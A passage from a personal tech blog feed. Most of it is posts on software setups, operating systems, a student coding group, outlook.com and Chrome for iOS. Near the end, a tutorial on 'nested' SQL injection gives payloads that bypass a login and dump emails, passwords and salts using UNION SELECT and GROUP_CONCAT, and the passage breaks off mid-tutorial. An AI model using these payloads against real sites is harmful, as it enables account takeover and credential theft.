Keep watching this space for info. If you have any queries, just <a href="https://github.com/captn3m0/hackertray/issues/new">file an issue on GitHub</a> or <a href="mailto:[email protected]">contact me</a>.</p> Aboard the Nautilus 2013-09-21T00:00:00+00:00 https://captnemo.in/blog/2013/09/21/aboard-the-nautilus <p>I’d done a <a href="http://captnemo.in/blog/2009/12/04/nautilus-behind-the-curtains/">post</a> on this a long time back (2009), detailing all the software I use on a daily basis. This is an update to that post.</p> <p>Since the last post, I’ve moved on to using Linux, using Elementary OS as my primary OS. Over the time period this post was written, I’ve shifted from using Cinnamon to Openbox and finally to elementaryOS’s pantheon as my Desktop Manager. I’m thinking of switching to Arch Linux, just to get a faster experience. I use Synapse as my application launcher, because it’s much faster than anything else out there.</p> <p>For most of my web browsing needs, I rely on Google Chrome Stable and a daily build of Chromium (v31 as of now) for most of my work. I switch between them all the time. I use Firefox (stable) only to test out my projects from time to time.</p> <p>The current editor I use is Sublime Text. It is everything you need, and much more. I’m still to get started using its build system, and its plethora of packages; but it’s still an excellent choice for a daily use editor. 
On the command line, I use Vim, git (with <a href="https://github.com/ndbroadbent/scm_breeze" title="Faster Git Shortcuts">SCM Breeze</a>), <a href="https://github.com/clvv/fasd" title="Command Line Booster">fasd</a> and <a href="https://github.com/jonas/tig" title="Excellent Git CLI">tig</a>, which is an excellent git interface on the command line.</p> <p>I listen to music on my own browser-based music player, called <a href="https://sdslabs.co.in/muzi" title="Link works only inside IITR">Muzi</a>, YouTube and GrooveShark.</p> <p>For my terminal needs, I use Gnome-Terminal. I use <a href="http://byobu.co/">Byobu</a> to manage my session, and often connect to it from other computers as well. It’s an excellent multiplexer that fits in my workflow really well.</p> <p>I use <a href="http://imo.im/">Imo.im</a> on both the Desktop and my tablet to chat. I occasionally use <a href="http://sourceforge.net/projects/retext/">ReText</a> for editing markdown files. I use <a href="http://jonls.dk/redshift/">RedShift</a> on my laptop and <a href="http://justgetflux.com/">f.lux</a> on my iPad to help me sleep better. I recommend it to everyone who is suffering from eye-strain or wants to sleep better.</p> <p>On the browser, my most visited sites would be <a href="https://news.ycombinator.com/">Hacker News</a> (via hckrnews.com), <a href="http://workflowy.com/">WorkFlowy</a> for managing my to-do list and GitHub on a daily basis for most of my projects.</p> <h2 id="hardware">Hardware</h2> <p>I own an old Nokia X3-02, and will be upgrading to a <a href="https://www.mozilla.org/en-US/firefox/os/">Firefox OS Phone</a> soon enough. I use a Dell Inspiron 1545 as my personal machine. I also use an iPad 2 (with 3G) on a daily basis (mostly for reading). I also own a Dayan Zhanchi 3x3 and a 5x5 shengshou speed cube.</p> <h2 id="ipad-apps">iPad Apps</h2> <p>The must have iPad apps for me are Chrome, <a href="https://imo.im/iphone/">imo</a>, and iBooks. 
I have installed <a href="http://www.mailboxapp.com/">Mailbox</a> alongside GMail, and haven’t used GMail since I installed it. I sometimes write stuff using <a href="http://www.hogbaysoftware.com/products/plaintext/">Plaintext</a>, and sketch using <a href="http://www.fiftythree.com/paper">Paper</a>. I read my RSS feeds using Newsify and Feedly.</p> <h2 id="extensions">Extensions</h2> <p>Chrome Extensions that I use on a daily basis include <a href="http://chimeapp.com/">Chime</a> for wonderful notifications (highly recommended), <a href="http://www.ghostery.com">Ghostery</a> for getting a tracker-free internet, <a href="https://www.eff.org/https-everywhere">HTTPS Everywhere</a> to keep me secure, <a href="http://lastpass.com/">LastPass</a> to manage passwords and <a href="https://chrome.google.com/webstore/detail/stylish/fjnbnpbmkenffdnngjfgmeleoegfcffe">Stylish</a> for <a href="http://userstyles.org/users/183835">customizing</a> the looks of various websites.</p> <h2 id="dream-setup">Dream Setup</h2> <p>My dream setup would consist of a lightweight Ubuntu Laptop that I can carry around that still has lots of processing power and battery life. I’ll pretty much be satisfied by any high-end Android phone as long as it has a decent battery life.</p> Why I still recommend Windows 2013-07-21T00:00:00+00:00 https://captnemo.in/blog/2013/07/21/why-i-still-recommend-windows <p>Even though I am a long time Linux user, and a big time fan of the many Linux distros that I’ve tried out over time, I still go around recommending Windows to people who ask me for advice. The only exception I make is when the person in question is a developer, in which case I try to convert them to the Church of Linux.</p> <p>The main reason I recommend Windows to non-developers is because it is a far better operating system than most Linux distributions (for general public). 
Now, before you bring out your pitchforks, hear me out.</p> <p>The first and foremost reason that I give is that Windows sports a far better integration across all its services. Nautilus/Nemo in the Linux world do not reach the same level of integration that Windows Explorer does. For instance, just look at the way the “Send To” feature works in explorer. To add a folder to the send to entry, you just have to add a shortcut to that folder inside the special “Send To” folder. On nautilus, the equivalent would be going about installing an extension, and editing a configuration file by hand.</p> <p>Or take a look at the “Play All” feature in Explorer. Or the “Libraries” feature in Windows 7. Or the simple way that you handle file sharing in Windows. Even though Linux has (arguably better) Samba support for file sharing, you have to go about editing a handful of files to make it work. I personally find apache easier to configure to just share files one way.</p> <p>Games are another reason. Even though Steam is available on Linux, all of the non-Valve triple-A titles are missing on Linux. Even though I continue to buy and play the Humble Bundles that offer Linux as a platform, I’m reminded of the stark reality every day when my friends ask me if I’ve played a recent title such as Call of Duty, Metro, NFS or even Swapper.</p> <p>The next peeve that comes to my mind is the ridiculous driver support. It has been improving since a long time, but it’s still <em>not there</em>. Even Ubuntu needs to fetch proprietary drivers for my WiFi support on Broadcom, which needs an internet connection in the first place. This means I need to find out a LAN network connection to even start using Ubuntu. Similarly the pain I’d to go through to install drivers for Ralink network drivers on a friend’s laptop was immense. I can never use circular scrolling or touchpad zoom on my laptop in Linux because there are still no drivers available anywhere for it. 
And don’t get me started on UEFI boot issues. No matter what people believe or pretend, hardware support is just not good enough to be relied on in the Linux world. As a side note, I haven’t synced my iPad in Ubuntu since I shifted to iOS 5, and apple driver support on Linux will remain abysmal forever just because iTunes will never be released for Linux. The last version of iOS that had music sync support (via libimobiledevice) was iOS 4.0 (released 3 years ago in June 2010).</p> <p>Next I want to point out the upgrade pain that everyone has to go through. It’s like a constant rite of passage, which turns a Linux noob into an actual user. I am yet to do an Ubuntu upgrade which went smoothly and didn’t break a thing; and I’ve been upgrading my Ubuntu since 10.04 was released. The <a href="http://askubuntu.com/questions/tagged/upgrade">upgrade tag</a> on askubuntu is chock full of horror stories.</p> <p>Another thing that frustrates me to no end is that the Ubuntu Dash, and the GNOME Overview are both slow as hell. I’m currently using Cinnamon, which is faster than both of these, but still an order of magnitude slower than the Windows Start Menu. Synapse is better, but <a href="http://askubuntu.com/questions/174838/can-i-change-synapse-shortcut-to-super-windows-key-alone">cannot be set as the default</a>.</p> <p>I was using Windows 7 on my cousin’s laptop these last few days and I remembered the favourite app that I used to no end: Everything. It is the quickest file search I’ve ever used. The alternatives, in the Linux world are synapse, zeitgeist, and plain old locate command. The only issue is that I’ve to run updatedb manually, while Everything was always up to date, using the NTFS File Journal. 
To this date, I am yet to find a good enough alternative to Everything.</p> <p>It is true that Windows lacks many of the good things that Linux distros provide, such as the excellent package management support, POSIX compatibility, and the plethora of tools we get on the command line; but at the same time, it is also a better operating system for most of the masses. I’ll continue to recommend Windows to all my non-developer friends till “The year of Desktop Linux” arrives.</p> SDSLabs - My experiences 2012-12-27T00:00:00+00:00 https://captnemo.in/blog/2012/12/27/sdslabs-personal-blog-post <h2 id="introduction">Introduction</h2> <p>For the past two years, I have been involved in a student group in our campus called SDSLabs. It has been the most fun two years of my life. I have acted as programmer, developer, manager, monkey-coder, event-manager and all other roles one might expect in a startup. However, I have never really blogged about any of this. Someone pointed it out recently to me, the truth is I have been meaning to write this since a very long time, but it’s kind of hard to put down in words. I’ll try my best. This post is highly specific to IIT Roorkee (you have been warned).</p> <h2 id="chronology-of-events--timeline">Chronology Of Events / Timeline</h2> <p>Back in my first year, after joining something called SDS as a proficiency in the campus, I was learning PHP. With no-one to guide me, I had only attended a single talk by Shobhit Singh where he talked about dynamic websites. I was instantaneously hooked. I did something called lion, a twitter clone and it won 3rd prize in Srishti. It had follow, unfollow, messages, tweets, and groups (one feature which set it apart from twitter).</p> <p>The code was a mess of php and inline html, and I have never looked upon it since. I did a couple more projects by myself, learning the ins and outs of php (I was still to hear about ruby/python). 
At the end of my first year, I did a project management system under Kumar Shashank who taught me about MVC and the need of architecture in a software application.</p> <p>At the very end of the project, a group called <a href="http://sdslabs.co/">SDSLabs</a> was formed. Along with a few people Shobhit sir had found, we founded SDSLabs. Everyone in the group was passionate about building things. And somehow, magically, I was in it. And there began the most beautiful chapter of my life..</p> <h3 id="coding--learning">Coding &amp; Learning</h3> <p>After completing the PMS (Project Management System), I moved on to work on Filepanda, and then the entire framework application for SDSLabs. All our applications are powered by a single API, which I wrote. Meanwhile, Harshil was working on DC++, and other awesome things. I met pranav sir, and was introduced to the thousand-quirks-of-css. It shifted to mint, and then to ubuntu. I learned the ins-and-out of managing a linux system. Back then SDSLabs was limited to the small committee room in Hobbies Club (with Shobhit Sir working tirelessly on funding for a better lab).</p> <p>And I met Ishan Sir. If you are reading this, thank you for teaching me how to learn. I had tons of night-outs with him discussing things I barely remember now. I became a creator. I executed on tons of ideas. Most never saw the second day in their lives, but I still have them with me, as memento of the past and what was to be. Ishan Sir was a gold-mine for learning. Everything I could ever ask, and he’d hand over a resource. Some of my most productive learning days were spent with him.</p> <h3 id="recruitments">Recruitments</h3> <p>After a single semester of work, we held our first recruitments. 
I wrote my <a href="https://blog.sdslabs.co/2011/09/recruitment-experience">first blog post for the lab</a> at the time noting down my amazing reaction to the awesome people that had joined the lab.</p> <p>It is difficult to distil into words the awesome learning experience I had with all these people. Going to chapos, thinking about how we could expand. What else awesome stuff we could do? One night hackathons, where we coded awesome stuff.</p> <p>And I started to work on Muzi, which was to be <em>my application</em>. It stands at 811 commits today, with over 200 issues in our project management system. I went into the development knowing PHP and bits of AJAX, and came out a JQuery fanboy. Muzi has been my primary music player for almost a year now. It feels awesome to listen to music on a music player you coded. The initial version was based on Zune’s design on Windows. We kept on improving it till it was exactly what we wanted. Today, people have listened to almost 1 lac songs on Muzi, and it feels awesome to have been behind something that is so widely used (within the campus).</p> <h3 id="launch">Launch</h3> <p>The next semester involved our <a href="http://blog.sdslabs.co/2011/11/launch-and-beyond">actual launch (11-11-11)</a> of all our applications. We had all converted into semi-breathing coding machines cum zombies by that time though. Sleepless and exhausted, we did prevail, and launched a few hours early. The Launch was appreciably received in the campus, although I had to leave for the <a href="https://captnemo.in/blog/2011/11/20/cctc-blog/">Deloitte CCTC Contest</a> the very same day (which we won!).</p> <p>I ended up doing a rewrite of Codematics (codename CodeBot) in node for the launch. It has a geeky, command line interface which was inspired by <a href="http://goosh.org/">goosh</a> and <a href="https://uni.xkcd.com/">xkcd’s unix interface</a>. 
Along with that, Muzi was launched to huge appreciation as well.</p> <h3 id="recruitments-again">Recruitments Again</h3> <p>This was the semester where our group actually expanded. Our count is almost 42 now, and nothing could make me more glad than actually being with all these people.</p> <p>I donned lots of hats teaching, guiding, coding, and managing people. Linux became one of my top skills, and I learnt a lot. We shifted to Redmine for management, and I ended up doing a lot of server-administration related stuff (gitolite, redmine, vhosts, apache, varnish etc).</p> <p>It has almost been a year since our last recruitment. We have been working on tons of things; some of which will be launched soon. I took lectures on far apart topics from <a href="https://speakerdeck.com/captn3m0/ux-and-usability-designing">“Usability Designing”</a> to <a href="https://speakerdeck.com/captn3m0/software-development-101">“Software Development 101”</a>. I mostly worked on internal features, improving our API, and something called Presence. We also <a href="https://captnemo.in/blog/2012/05/23/phonegap-blog-post/">participated</a> in <a href="http://blog.sdslabs.co/2012/09/hacku">two hackathons</a>, and we won both of them.</p> <h2 id="where-now">Where, now?</h2> <p>Our group is still nascent, and although I have not mentioned every project that the group (or even I) have done for fear of making this post too long. That itself speaks volumes about what we’ve done in a short span of two years. Our tagline reads <em>“iDream. iCode. iInnovate”</em>. I wish for the group to continue on that path. Develop things that make life easier; for everyone around the world.</p> <h2 id="people">People</h2> <p>Throughout this journey, there have been lots of people, without whom this blog post would never have been written. You all know who you are. Keep being awesome.</p> <h2 id="skills">Skills</h2> <p>I used to call myself a programmer, but now I’m in a more management-esque role in SDSLabs. 
It’s my share of the work to manage projects, and track progress. That does not mean that I’ve given up coding, and I still do code a lot for our internal projects. I have also become somewhat of a UX enthusiast, taking care of most ux work done in lab. I have also found myself becoming an avid learner, and have Ishan Sir to thank for that.</p> <h2 id="anecdotes--stories">Anecdotes &amp; Stories</h2> <p>This post already reads more like a things-i-did-at-sdslabs, which is something I was hoping to avoid, instead of why-i-love-sdslabs, which is what I wanted. So I’m gonna stick a few moments and events that stand out to me…</p> <ul> <li>We have a board with three defining people on it: Steve Jobs, Dennis Ritchie, and Linus Torvalds.</li> <li>We have had mind-blowing pizza chapos. So many pizzas that they were brought in 2 rickshaws from dominos. Yup.</li> <li>I am known as the bot in lab. Mostly because of my highly rational unemotional responses, and other things. There is another person, who is trying to get that title, though.</li> <li>I am famously known for turning down “writing a letter that could have fetched us lots of funding” for coding instead. (In my defense, there were other people who could have handled it better than me, and we didn’t need it badly at the time)</li> <li>Almost every group in the campus describes their group as a second home. But in our case it is partially true. We spend almost all our free time in lab. I spent close to 500 hours in the lab in this semester alone. Where does this all this time go? Talking, discussions, development, teaching, lectures among other things.</li> <li>SDSLabs feels more of a startup than an actual student group to me (and Shashank as well). We have to fight for our funding, manage people, and develop products.</li> <li>I have done way too much copy-editing to be called “just a developer” anymore. 
I have spent hundreds of hours fighting Pinta and its numerous bugs.</li> </ul> <p>It has been a great experience working with all these people. I can just hope that the group keeps moving to better innovation, and grander ideas in the future. We are recruiting from first year in upcoming January. If SDSLabs feels like a place you’d enjoy, just come over and take our test. It changed my life, maybe it will change yours too.</p> Why I'm leaving outlook.com 2012-12-22T00:00:00+00:00 https://captnemo.in/blog/2012/12/22/why-i-m-moving-from-outlook <p>I’d been one of the most eager users of the new outlook.com redesign. I’m a real fan of Metro (sorry, I must call it the New Windows 8 Design), and think that the correct typography mixed with the correct design language should help the users in a great way forward.</p> <p>Unfortunately, outlook.com is not there yet. The application was made to resemble the Windows Mail app in Windows 8, with 3 tiles per screen. On Windows, the application works in 1/2/3 width modes differently. It changes its navigational strategy to allow you to browse your emails easily. While this could have been easily accomplished using responsive design techniques on the web, outlook does not use it and loses sorely needed functionality.</p> <p>The typography of the app is horribly broken, especially in Linux. The font of choice for the app is Calibri, which is missing in Linux, and as such, uses the default system font from the browser. The font sizes are inconsistent, and the application shortcuts are horrible, even though I am using GMail shortcuts option.</p> <p>The “Insert Link” option is horribly designed. It does not respond to enter keys, and has no place to add “Text” for the link either.</p> <p>There is no mechanism for quoting messages properly at all. There is no such thing like Conversation View, and I have to waste large amounts of time just to figure out what was added new in the reply to my own mail. 
As such this becomes largely cumbersome to keep up with.</p> <p>The archive option from GMail (which keeps my inbox clean) is notably missing as well. (Update: This was added later, with the ability to use archive to move to any custom folder)</p> <p>The “Active View”, which seems to be a quick preview mode, only works on Windows, because it uses Silverlight. I tried using Moonlight (Silverlight’s OSS clone for Linux), but it seems that Active View uses new Silverlight features. Hence, I can only download pics from Outlook, and not browse them online (which is a huge pain-point for me).</p> <p>/Rant</p> Things I expect in a Chrome/iOS update 2012-07-14T00:00:00+00:00 https://captnemo.in/blog/2012/07/14/chrome-ios <p>I’ve changed to using Chrome for iOS as my primary browser. Since I only own an iPad 2, all of my observations are with regard to the iPad version of the browser.</p> <h2 id="why-i-love-chrome">Why I love Chrome</h2> <p>Chrome is already my primary browser on my primary machine, and after it came out for the iOS, I tried it out hesitantly, but to my surprise (contrary to what the internet says) it is working out even better than expected.</p> <ul> <li>Ability to sync tabs across my laptop and tablet. I can leave my laptop and continue reading on the go. I don’t own a Mac, so I can’t comment against how Safari/iCloud does it, but it works well enough for me.</li> <li>All my desktop bookmarks (and bookmarklets) are available and functioning instantly.</li> <li>Omnibox is awesome, and saves me a lot of trouble, looking in my history, bookmarks, and pre-fetching stuff. This was the most important feature that Chrome v1 brought along with it (when it was released in Windows), and it’s nice to find it work exactly as intended.</li> <li>Incognito Mode (I previously used Dolphin in private mode, but this is far better).</li> <li>Complete bookmark listing while creating a new bookmark. 
Unlike Desktop version of Chrome, which only shows 5 most recently used folders. I bookmark stuff extensively, and it makes the process much easier for me than on the desktop version, ironically. <a href="/img/bookmark_compare.png">See Image for Comparison</a></li> <li>Tab Switching is brilliant. It seems to be inspired/copied straight from <a href="http://itunes.apple.com/us/app/paper-by-fiftythree/id506003812?mt=8">Paper</a>, but it is executed well enough for me. It gets better once you get used to it. The tab bar itself is scrollable as a plus (you can hide/unhide tabs). I’ve read people complaining about this, but it helps me browse on the ipad one-handed.</li> <li>It feels fast, especially after continuous use. I don’t know if it’s the ported networking stack, or better caching, but page load speeds are better than Safari for me in general.</li> </ul> <p><strong>Note</strong>: If you have a jailbroken device, you can setup Chrome as your default browser using BrowserChooser from Cydia. The best part is that home-screen shortcuts open in Chrome as well. I’ve ditched Facebook App for a shortcut icon to <code class="language-plaintext highlighter-rouge">touch.facebook.com</code> as a result.</p> <h2 id="things-i-want">Things I want</h2> <ul> <li>Support for <strong>configurable search engines</strong>. I use them extensively (for eg <strong>d</strong>uckduckgo, google <strong>l</strong>ucky search, <strong>a</strong>mazon, <strong>e</strong>bay, <strong>g</strong>it<strong>h</strong>ub, <strong>s</strong>tack<strong>o</strong>verflow and even google <strong>m</strong>obile search). The pre-defined search engines are of no use to me (Bing/Yahoo/Guruji).</li> <li><strong>Find in Page</strong>. This is a no-brainer. 
<strong>Edit</strong>: This is available via <a href="http://www.addictivetips.com/ios/great-cydia-tweaks-for-chrome-iphone-ipad/">Chrome Customizer</a> in Cydia for a jailbroken device.</li> <li>Ability to <strong>turn off images/javascript</strong> (Content Settings). I’m not sure if it will be possible w/o proxying like how Opera does, but this would be nice to have (since people might want to save bandwidth on 3g).</li> <li>Support for emailing an entire page (rendered).</li> <li><strong>UserScript support</strong>. I don’t know if apple would allow it at all, but I think the Apple ToS disallows code to be downloaded. What if there were some sort of linking support to allow me to insert some external script tag?</li> <li><strong>Readability/iReader</strong> like support. The safari readability link does work wonders. This could be simulated with a bookmarklet, but once again calling them is hard. <strong>Update</strong>: ChromeCustomizer can do this via settings menu (see below).</li> <li><strong>Better access to bookmarks/bookmarklets</strong>. At least show me the mobile bookmarks so I can keep them separate.</li> <li>Wait a bit more before taking the page snapshot for the speed-dial. The GMail snapshot has always been blank for me. At least check if the snapshot is completely blank, and wait a bit more if that is the case.</li> <li>App shortcuts. The kind like you get for almost all websites on Chrome Webstore. I think they are referred to as <strong>“Chrome Apps”</strong> against “Extensions”, which would be completely disallowed as per Apple ToS. Since Apps are just shortcuts and some icons, they should be allowed in some manner.</li> <li><strong>Better history</strong> support. Seeing just the last 6 closed tabs kind of sucks. Give me some real history browser (and improve the one in desktop chrome while you’re at it).</li> <li>Mailto support (for gmail etc). Don’t know if possible, but would be nice to have.</li> <li>Selection Mailing. 
Just let me select and mail some html.</li> <li><strong>Handle pdfs</strong> better. By default chrome redirects to Safari for pdfs. After changing Chrome to default, it does handle pdfs fine, but I miss the “Open In iBooks” link. Don’t see this happening though. (Update: This was fixed in a Chrome Update)</li> <li><strong>Webintents</strong> support would be nice to have (via something other than chrome Webstore, I Guess)</li> <li><strong>CloudPrint</strong> support. I don’t use this, but I am assuming there are people who do.</li> <li><strong>FullScreen</strong> support of some sort. Safari in iOS 6 is bringing this much asked for feature, so there are people who would love to have this. Chrome’s faster tab switching should help it out with some of the Full Screen issues. (<strong>Edit</strong>: This is available via a three finger tap if you install <a href="http://www.idownloadblog.com/2012/07/01/chromizer/">Chromizer</a> from Cydia’s ModMyi repo). Chromizer also forces the iPhone style tab switching on the iPad as a side-effect.</li> </ul> <p>There is also a <a href="http://www.idownloadblog.com/2012/07/01/chromeurl/">ChromeURL</a> tweak available for Jailbroken devices that changes the keyboard layout to the one used for address bar in Safari (So called tld keyboard).</p> <p>Another one called <a href="http://modmyi.com/content/8108-chromecustomization-adds-some-new-stuff-google-chrome.html">ChromeCustomizer</a> offers the following:</p> <ul> <li>Add one bookmarklet to the settings menu. I’m using <a href="http://readable.tastefulwords.com/">Readable</a> at present.</li> <li>Adds a broken fullscreen implementation (maybe it is clashing with Chromizer) via the Menu. I prefer Chromizer’s 3 finger tap for fullscreen.</li> <li>Adds a Find in Page feature. 
<strong>Update</strong>: This is now available</li> <li>Adds some filtering for ads/tracking websites.</li> <li>Adds an option to change Chrome tab switching mode (iPhone vs iPad).</li> </ul> <p>See <a href="http://www.addictivetips.com/ios/great-cydia-tweaks-for-chrome-iphone-ipad/">this blog post</a> for some more tweaks available on cydia.</p> Nested SQL Injections 2012-06-09T00:00:00+00:00 https://captnemo.in/blog/2012/06/09/nested-sql-injections <p>I recently did something along this line, and this technique is really cool. (I prefer to call it “inception” injection). It’s pretty easy once you figure it out, so here it goes.</p> <p>If the result of the first query is used as an input in the second query, and the first query is vulnerable, we can use the output as an “input variable” into the second query itself. This would be useful in places where the second query has a better display method than the first one (for instance length restrictions).</p> <h2 id="query-1">Query 1:</h2> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">users</span> <span class="k">WHERE</span> <span class="n">email</span><span class="o">=</span><span class="s1">'$email'</span> <span class="k">AND</span> <span class="n">password</span> <span class="o">=</span> <span class="s1">'$pass'</span></code></pre></figure> <p>This query is usually accompanied with:</p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span> <span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'email'</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$row</span><span class="p">[</span><span class="s1">'username'</span><span class="p">];</span></code></pre></figure> <h2 id="query-2">Query 2:</h2> <p>Assuming something like a profile page:</p> <figure class="highlight"><pre><code class="language-sql" 
data-lang="sql"><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">user_details</span> <span class="k">WHERE</span> <span class="n">email</span><span class="o">=</span><span class="s1">'{$_SESSION['</span><span class="n">email</span><span class="s1">']}'</span></code></pre></figure> <h2 id="injection">Injection</h2> <p>Injecting the first query (basic)</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">users</span> <span class="k">WHERE</span> <span class="n">email</span><span class="o">=</span><span class="s1">'[email protected]'</span> <span class="o">#</span> <span class="k">AND</span> <span class="n">password</span><span class="o">=</span><span class="s1">''</span></code></pre></figure> <p>Everything after # should be treated as a comment. Henceforth, I would not write stuff after # for brevity.</p> <p>Thinking backwards, we could create a custom query for user_details:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">user_details</span> <span class="k">WHERE</span> <span class="n">email</span><span class="o">=</span><span class="s1">''</span> <span class="k">UNION</span> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">user_details</span> <span class="o">#</span></code></pre></figure> <p>This would show the details of the first user in the profile page. 
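</p> <p>The data flow from Query 1 into Query 2, with the concatenated queries beside parameterized ones, as an added example that is not part of the original post. It assumes Python with an in-memory SQLite database (so the comment marker is <code>--</code> rather than MySQL’s <code>#</code>); the sample rows, the function names and the session dict are constructed for illustration.</p>

```python
import sqlite3

# Constructed sample data. Table names follow the post's queries; the column
# layout (3 columns in user_details) and all rows are assumptions made here.
# The plaintext password column only mirrors the post's Query 1.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (email TEXT, username TEXT, password TEXT);
        CREATE TABLE user_details (email TEXT, full_name TEXT, city TEXT);
        INSERT INTO users VALUES ('alice@example.test', 'alice@example.test', 'pw-a');
        INSERT INTO users VALUES ('bob@example.test', 'bob@example.test', 'pw-b');
        INSERT INTO user_details VALUES ('alice@example.test', 'Alice', 'Pune');
        INSERT INTO user_details VALUES ('bob@example.test', 'Bob', 'Delhi');
    """)
    return conn

# --- Concatenated versions, mirroring Query 1 and Query 2 from the post ---

def login_concatenated(conn, email, password):
    sql = ("SELECT * FROM users WHERE email='" + email +
           "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    # Same as $_SESSION['email'] = $row['username']: the session now holds
    # whatever the query returned, not what a verified user typed.
    return {"email": row[1]} if row else None

def profile_concatenated(conn, session):
    sql = "SELECT * FROM user_details WHERE email='" + session["email"] + "'"
    return conn.execute(sql).fetchall()

# --- Parameterized versions: every value is bound, including the one that
# --- came back out of the database via the session.

def login_parameterized(conn, email, password):
    row = conn.execute(
        "SELECT username FROM users WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()
    return {"email": row[0]} if row else None

def profile_parameterized(conn, session):
    return conn.execute(
        "SELECT * FROM user_details WHERE email = ?", (session["email"],)
    ).fetchall()

# Constructed inputs, adapted from the post's basic injection and its UNION
# on user_details (SQLite comment syntax). The session value stands for a
# string that reached the session through the result of Query 1.
BASIC_LOGIN_INPUT = "alice@example.test' --"
HOSTILE_SESSION_VALUE = "' UNION SELECT * FROM user_details --"

def run_checks():
    conn = make_db()
    hostile = {"email": HOSTILE_SESSION_VALUE}
    return {
        "login_concat": login_concatenated(conn, BASIC_LOGIN_INPUT, "wrong"),
        "login_param": login_parameterized(conn, BASIC_LOGIN_INPUT, "wrong"),
        "profile_concat_rows": len(profile_concatenated(conn, hostile)),
        "profile_param_rows": len(profile_parameterized(conn, hostile)),
    }

if __name__ == "__main__":
    for name, value in run_checks().items():
        print(name, "=", value)
```

<p>Binding the session value matters as much as binding the login form fields: a value read back from the database or the session is still input to the next query.</p> <p>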
Let’s think a bit larger:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">user_details</span> <span class="k">WHERE</span> <span class="n">email</span><span class="o">=</span><span class="s1">''</span> <span class="k">UNION</span> <span class="k">SELECT</span> <span class="n">GROUP_CONCAT</span><span class="p">(</span><span class="n">email</span><span class="p">),</span> <span class="n">GROUP_CONCAT</span><span class="p">(</span><span class="n">password</span><span class="p">)</span> <span class="k">FROM</span> <span class="n">user_details</span> <span class="o">#</span></code></pre></figure> <p>Usually, this won’t work (different number of columns in results). You’d have to use ORDER BY to guess the number of columns. Writing only the <code class="language-plaintext highlighter-rouge">UNION</code> part now:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">UNION</span> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">user_details</span> <span class="k">ORDER</span> <span class="k">BY</span> <span class="mi">1</span> <span class="o">#</span> <span class="k">UNION</span> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">user_details</span> <span class="k">ORDER</span> <span class="k">BY</span> <span class="mi">2</span> <span class="o">#</span> <span class="k">UNION</span> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">user_details</span> <span class="k">ORDER</span> <span class="k">BY</span> <span class="mi">3</span> <span class="o">#</span> <span class="k">UNION</span> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">user_details</span> <span class="k">ORDER</span> <span class="k">BY</span> <span 
class="mi">4</span> <span class="o">#</span> <span class="c1">-- Gives Error</span></code></pre></figure> <p>So we realize that user_details has 3 columns. Coming back, we could do:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">UNION</span> <span class="k">SELECT</span> <span class="n">GROUP_CONCAT</span><span class="p">(</span><span class="n">email</span><span class="p">),</span> <span class="n">GROUP_CONCAT</span><span class="p">(</span><span class="n">password</span><span class="p">),</span> <span class="mi">3</span> <span class="k">FROM</span> <span class="n">users</span> <span class="o">#</span></code></pre></figure> <p>That would give us details up to 1000 characters (the GROUP_CONCAT limit). To work around that limit:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">UNION</span> <span class="k">SELECT</span> <span class="n">GROUP_CONCAT</span><span class="p">(</span><span class="n">email</span><span class="p">),</span><span class="n">GROUP_CONCAT</span><span class="p">(</span><span class="n">password</span><span class="p">),</span><span class="n">GROUP_CONCAT</span><span class="p">(</span><span class="n">salt</span><span class="p">)</span> <span class="k">FROM</span> <span class="p">(</span><span class="k">SELECT</span> <span class="n">email</span><span class="p">,</span><span class="n">password</span><span class="p">,</span><span class="n">salt</span> <span class="k">FROM</span> <span class="n">users</span> <span class="k">LIMIT</span> <span class="mi">50</span> <span class="k">OFFSET</span> <span class="mi">0</span><span class="p">)</span></code></pre></figure> <p>Change the OFFSET and you’re ready to roll.</p> <h2 id="inception-injection">Inception Injection</h2> <p>This was all a theoretical attack on the second query. Granted you could do lots of stuff from here on the first query, but it is far less responsive (it doesn’t give much output).
The only thing you can modify is the email, which offers you a single field.</p> <p>However, the only attack vector (<code class="language-plaintext highlighter-rouge">$_SESSION</code>) for the second query is not directly controlled, but comes instead from the result of the first query. So to perform this attack on the second query, we take the second injection, and use it inside the first one.</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">users</span> <span class="k">WHERE</span> <span class="n">email</span><span class="o">=</span><span class="s1">''</span> <span class="k">UNION</span> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">users</span> <span class="o">#</span> <span class="c1">-- will give us first user</span> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">users</span> <span class="k">WHERE</span> <span class="n">email</span><span class="o">=</span><span class="s1">''</span> <span class="k">UNION</span> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">users</span> <span class="k">ORDER</span> <span class="k">BY</span> <span class="mi">1</span> <span class="o">#</span> <span class="c1">-- keep increasing to get number of columns</span> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">users</span> 